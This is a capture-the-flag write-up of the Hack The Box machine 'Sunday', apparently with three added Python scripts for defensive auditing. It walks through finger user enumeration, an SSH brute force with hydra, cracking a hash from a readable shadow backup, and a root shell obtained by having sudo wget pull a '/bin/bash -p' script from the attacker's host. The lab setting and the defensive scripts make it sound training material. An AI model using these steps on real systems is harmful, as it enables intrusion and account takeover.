Hack The Box : Sunday
21 July, 2021
Beginning with an nmap scan:
# nmap -A -sC -sV -O 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 04:23 EDT
Nmap scan report for 10.10.10.76
Host is up (0.51s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
|_ No one logged on
111/tcp open rpcbind
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.91%I=7%D=7/21%Time=60F7D9EB%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n");
Aggressive OS guesses: Sun Solaris 10 (94%), Sun OpenSolaris 2008.11 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (SPARC) (91%), Sun Solaris 8 (91%), Sun Solaris 9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 385.09 ms 10.10.16.1
2 207.26 ms 10.10.10.76
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.56 seconds
I ran a few more scans on higher ports and found SSH running as well:
# nmap -A -sC -sV -p 20000-25000 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.76
Host is up (0.36s latency).
Not shown: 5000 closed ports
PORT STATE SERVICE VERSION
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
Aggressive OS guesses: Sun Solaris 10 (94%), Sun OpenSolaris 2008.11 (93%), Sun Solaris 9 or 10 (93%), Sun Solaris 9 or 10 (SPARC) (93%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (93%), Sun Solaris 10 (SPARC) (93%), Sun Storage 7210 NAS device (91%), Joyent SmartOS (90%), Oracle Solaris 11 (90%), Sun Solaris 8 (SPARC) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 430.50 ms 10.10.16.1
2 430.62 ms 10.10.10.76
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 642.50 seconds
Starting off with port 79: it is running the finger daemon, so let's try to enumerate users.
# nc -vn 10.10.10.76 79
(UNKNOWN) [10.10.10.76] 79 (finger) open
root
Login Name TTY Idle When Where
root Super-User pts/3 <Apr 24, 2018> sunday
I used finger-user-enum.pl with a username list from SecLists to see which users would come up:
./finger-user-enum.pl -U ./wordlists/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... ./wordlists/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..miof ???..mela ???..
root@10.10.10.76: root Super-User pts/3 <Apr 24, 2018> sunday ..
sammy@10.10.10.76: sammy console <Jul 31, 2020>..
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
sys@10.10.10.76: sys ??? < . . . . >..
######## Scan completed #########
13 results.
10177 queries in 3688 seconds (2.8 queries / sec)
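To make the exposure concrete, here is an added parser (mine, not part of the original writeup or the finger-user-enum tool) that reads the tool's "query@target: reply" lines above and separates confirmed accounts from the "???" noise, while recording what the daemon gives away for each one: real name, last login time, and the host or IP the login came from. The regexes assume the column layout this Solaris finger daemon prints (the "< . . . . >" marker for never-logged-in accounts, "pts/N" or "console" for sessions); the sample input is a constructed copy of the output shown above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a copy of the finger-user-enum lines shown above, in the tool's
# own "query@target: reply" shape, where ".." stands for a line break in the daemon's
# reply. Embedded so the parser runs offline; it is not live output.
ENUM_OUTPUT = """\
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
root@10.10.10.76: root Super-User pts/3 <Apr 24, 2018> sunday ..
sammy@10.10.10.76: sammy console <Jul 31, 2020>..
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
sys@10.10.10.76: sys ??? < . . . . >..
"""


@dataclass
class FingerRecord:
    login: str
    name: str = ""
    tty: Optional[str] = None          # terminal of the last (or current) session
    last_login: Optional[str] = None   # the "When" column
    origin: Optional[str] = None       # the "Where" column: host or IP the login came from
    logged_in_before: bool = False


HEADER = "Login Name TTY Idle When Where"
# "< . . . . >" is what this finger daemon prints for an account that never logged in.
NEVER_RE = re.compile(r"^(?P<login>\S+)\s+(?P<name>.*?)\s*<(?:\s*\.){4}\s*>$")
# An account with a session record: optional GECOS name, a tty, "<when>" and optional origin.
ACTIVE_RE = re.compile(
    r"^(?P<login>\S+)\s+(?P<name>.*?)\s*(?P<tty>pts/\d+|console|tty\S*)"
    r"\s+<(?P<when>[^>]+)>(?:\s+(?P<where>\S+))?$"
)
# "user ???" with nothing after it is the reply for a login that does not exist.
UNKNOWN_RE = re.compile(r"^\S+\s+\?\?\?$")


def parse_reply_line(line: str) -> Optional[FingerRecord]:
    """Parse one line of a finger reply; None for headers, blanks and unknown users."""
    line = line.strip()
    if not line or line == HEADER or UNKNOWN_RE.match(line):
        return None
    m = NEVER_RE.match(line)
    if m:
        name = m.group("name")
        return FingerRecord(m.group("login"), "" if name == "???" else name)
    m = ACTIVE_RE.match(line)
    if m:
        return FingerRecord(m.group("login"), m.group("name"), m.group("tty"),
                            m.group("when"), m.group("where"), True)
    return None


def parse_enum_output(text: str) -> Dict[str, FingerRecord]:
    """Collect confirmed accounts from finger-user-enum lines ("query@host: reply")."""
    records: Dict[str, FingerRecord] = {}
    for raw in text.splitlines():
        if "@" not in raw or ": " not in raw:
            continue
        reply = raw.split(": ", 1)[1]
        for line in reply.split(".."):
            rec = parse_reply_line(line)
            if rec and rec.login not in records:
                records[rec.login] = rec
    return records


def exposure_summary(records: Dict[str, FingerRecord]) -> Dict[str, List[str]]:
    """What an unauthenticated finger query leaks: valid logins, which of them are
    used interactively, and where those logins came from (treat all of it as disclosed)."""
    return {
        "valid_logins": sorted(records),
        "interactive_accounts": sorted(r.login for r in records.values() if r.logged_in_before),
        "login_origins": sorted({r.origin for r in records.values() if r.origin}),
    }


if __name__ == "__main__":
    for key, values in exposure_summary(parse_enum_output(ENUM_OUTPUT)).items():
        print(f"{key}: {', '.join(values)}")
```

Run against the sample, the summary lists thirteen valid logins, three interactive accounts (root, sammy, sunny) and two login origins; the second origin is a client IP, which is exactly the kind of detail a disabled finger service (or an allow-list on port 79) would keep private.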
I created a list of possible users and, since there was nothing more to look at, decided to brute force the SSH password:
# hydra -v -V -u -L users -P rockyou.txt -t 1 10.10.10.76 -s 22022 ssh
...
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
...
So now I have SSH credentials sunny:sunday.
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Wed Jul 21 17:17:24 2021 from 10.10.16.174
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)
sunny@sunday:~$ whoami
sunny
sunny@sunday:/home$ cat /etc/passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
The user flag wasn't present in sunny's directories, so I used find to locate it; it was in sammy's Desktop, which sunny couldn't access.
sunny@sunday:/home$ find / -name user.txt 2>/dev/null
/export/home/sammy/Desktop/user.txt
sunny@sunday:/home$ cat /export/home/sammy/Desktop/user.txt
cat: /export/home/sammy/Desktop/user.txt: Permission denied
Looking around, I found that sunny was allowed to run /root/troll as root.
sunny@sunday:~$ cat /root/troll
cat: /root/troll: Permission denied
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
sunny didn't have read or write access to this program, so it didn't look useful for now.
I found a backup of /etc/shadow at /backup/shadow.backup.
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I used john to crack the hash and a match was found:
# john --wordlist=../../wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (?)
1g 0:00:03:51 DONE 0.004319g/s 880.1p/s 880.1c/s 880.1C/s daddyzgurl..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
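A readable shadow backup is the real finding here, independent of any one cracked hash. The following audit script is an added example (mine, not from the writeup or from john) that parses shadow(5)-style lines, classifies each account as locked, password-less, empty or hashed, names the hash algorithm and its work factor from the "$id$" prefix, and checks whether a backup file is readable by group or others. The sample input is a constructed copy of the backup shown above; the algorithm table and the 5000-round default for sha256crypt/sha512crypt are standard crypt(3) conventions.

```python
import os
import stat
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the contents of /backup/shadow.backup as shown above, embedded
# so the audit runs offline.
SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# Modular-crypt identifiers (the "$id$" prefix) and their algorithm names.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
# Work factor used when no "rounds=" parameter is present.
DEFAULT_ROUNDS = {"sha256crypt": 5000, "sha512crypt": 5000}


@dataclass
class ShadowEntry:
    user: str
    password: str   # second field: a hash, or a marker such as *LK* / NP
    lastchg: str    # days since the epoch of the last password change (may be empty)

    @property
    def status(self) -> str:
        if self.password.startswith("*LK*"):
            return "locked"         # Solaris lock marker (may be followed by the old hash)
        if self.password in ("NP", "*NP*"):
            return "no-password"    # not a hash, so no password login is possible
        if self.password == "":
            return "empty"          # anyone can log in with no password at all
        if self.password.startswith("$"):
            return "hashed"
        return "other"              # e.g. legacy DES crypt or an unknown marker


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow(5) lines: user:password:lastchg:min:max:warn:inactive:expire:flag."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries.append(ShadowEntry(fields[0], fields[1], fields[2]))
    return entries


def describe_hash(password: str) -> Tuple[Optional[str], Optional[int]]:
    """Return (algorithm, rounds) for a modular-crypt string, else (None, None)."""
    if not password.startswith("$"):
        return None, None
    parts = password.split("$")          # ['', id, [rounds=N,] salt, hash]
    algo = CRYPT_IDS.get(parts[1], f"unknown(${parts[1]}$)")
    rounds = DEFAULT_ROUNDS.get(algo)
    if len(parts) > 2 and parts[2].startswith("rounds="):
        rounds = int(parts[2].split("=", 1)[1])
    return algo, rounds


def audit(entries: List[ShadowEntry]) -> List[str]:
    """Findings that matter once a shadow copy is readable by unprivileged users."""
    findings = []
    for e in entries:
        if e.status == "hashed":
            algo, rounds = describe_hash(e.password)
            findings.append(f"{e.user}: {algo} hash ({rounds} rounds) is exposed to "
                            f"offline guessing; rotate the password")
        elif e.status == "empty":
            findings.append(f"{e.user}: empty password field; lock it or set a password")
        elif e.status == "other":
            findings.append(f"{e.user}: legacy or unrecognised password field {e.password!r}")
    return findings


def backup_world_readable(path: str) -> bool:
    """True if group or others can read the file; a shadow backup should be 0400/0600, root-owned."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


if __name__ == "__main__":
    for finding in audit(parse_shadow(SHADOW_BACKUP)):
        print(finding)
```

On the sample this reports the two hashed accounts, sammy and sunny, as sha256crypt at the default 5000 rounds, which is the cost figure john printed above; the locked and NP system accounts produce no finding because nothing in those fields can be guessed against. The file check is the part to wire into a cron job or audit run: the backup was useful to an attacker only because a non-root user could read it.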
Using this, I was able to switch to sammy and get the user flag:
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
sammy@sunday:~$ whoami
sammy
sammy@sunday:~$ cd Desktop
sammy@sunday:~/Desktop$ ls
user.txt
sammy was allowed to run wget as root without a password:
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
My plan was to overwrite /root/troll using wget run as root, and then execute /root/troll as root using sunny's sudo permission.
# echo "/bin/bash -p" > troll
sammy@sunday:~$ sudo wget http://10.10.16.174:8000/troll -O /root/troll
--18:27:36-- http://10.10.16.174:8000/troll
=> `/root/troll'
Connecting to 10.10.16.174:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13 [application/octet-stream]
100%[=================================================================================================================================================================================================>] 13 --.--K/s
18:27:37 (2.72 MB/s) - `/root/troll' saved [13/13]
sunny@sunday:~$ sudo /root/troll
root@sunday:~# id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
root@sunday:~# whoami
root
root@sunday:~#
root@sunday:~# cat /root/root.txt
The window between downloading and executing /root/troll has to be very short, since something on the box restores the original file quite quickly.
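Two defensive checks follow from the sudo rule and the overwrite above: a sudoers rule audit that flags NOPASSWD entries for binaries whose normal options write to a caller-chosen path, and an integrity baseline for anything root executes via sudo, so that a swapped /root/troll is detected rather than merely restored a moment later. This is an added example of mine, not code from the writeup or from the box; the set of "arbitrary write" binaries is an assumed, illustrative list seeded only with wget (the one the page shows with -O), and the demo uses a throwaway temp file standing in for /root/troll.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List

# Constructed sample: the `sudo -l` output shown above.
SUDO_L_OUTPUT = """\
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
"""

# Assumed, illustrative list: binaries whose ordinary options write to a path the caller
# picks (wget's -O is the case on this page). Extend it for your own environment.
ARBITRARY_WRITE_BINARIES = {"/usr/bin/wget"}

# One `sudo -l` command line: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Turn `sudo -l` output into one record per command with its run-as user and tags."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                       # banner lines such as "User sammy may run ..."
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmd").split(","):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def assess_rules(rules: List[Dict[str, object]]) -> List[str]:
    """Flag rules that amount to writing files (or running anything) as the run-as user."""
    findings = []
    for r in rules:
        command = str(r["command"])
        if command == "ALL":
            findings.append(f"{r['runas']}: unrestricted ALL")
            continue
        binary = command.split()[0]
        if "NOPASSWD" in r["tags"] and binary in ARBITRARY_WRITE_BINARIES:
            findings.append(f"{binary} as {r['runas']} without a password: "
                            f"can write files owned by {r['runas']}; restrict arguments or remove")
    return findings


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(paths: List[str]) -> Dict[str, str]:
    """Record the digest of every file root will execute through sudo."""
    return {p: sha256_file(p) for p in paths}


def verify(snapshot: Dict[str, str]) -> List[str]:
    """Return the paths whose content changed since the baseline (or that vanished)."""
    changed = []
    for path, digest in snapshot.items():
        if not os.path.exists(path) or sha256_file(path) != digest:
            changed.append(path)
    return changed


def demo() -> List[str]:
    """Stand-alone walk-through with a temp file standing in for /root/troll."""
    target = os.path.join(tempfile.mkdtemp(), "troll")
    with open(target, "w") as f:
        f.write("#!/bin/sh\necho testing\nid\n")
    snapshot = baseline([target])
    with open(target, "w") as f:              # simulate an out-of-band overwrite
        f.write("#!/bin/sh\necho replaced\n")
    return verify(snapshot)                   # the overwritten path is reported


if __name__ == "__main__":
    for finding in assess_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(finding)
    print("changed:", demo())
```

The rule audit reports the wget entry; the same parser returns nothing for the rule without NOPASSWD, although a password-protected wget rule is still a root file write for anyone who knows sammy's password, so the binary list is the check that matters, not the tag alone. On the box, the restore loop that forced the short window above is a mitigation that reacts after the fact; a verify() run before each privileged execution (or an immutable, root-only /root/troll with no sudo entry at all) closes the window instead.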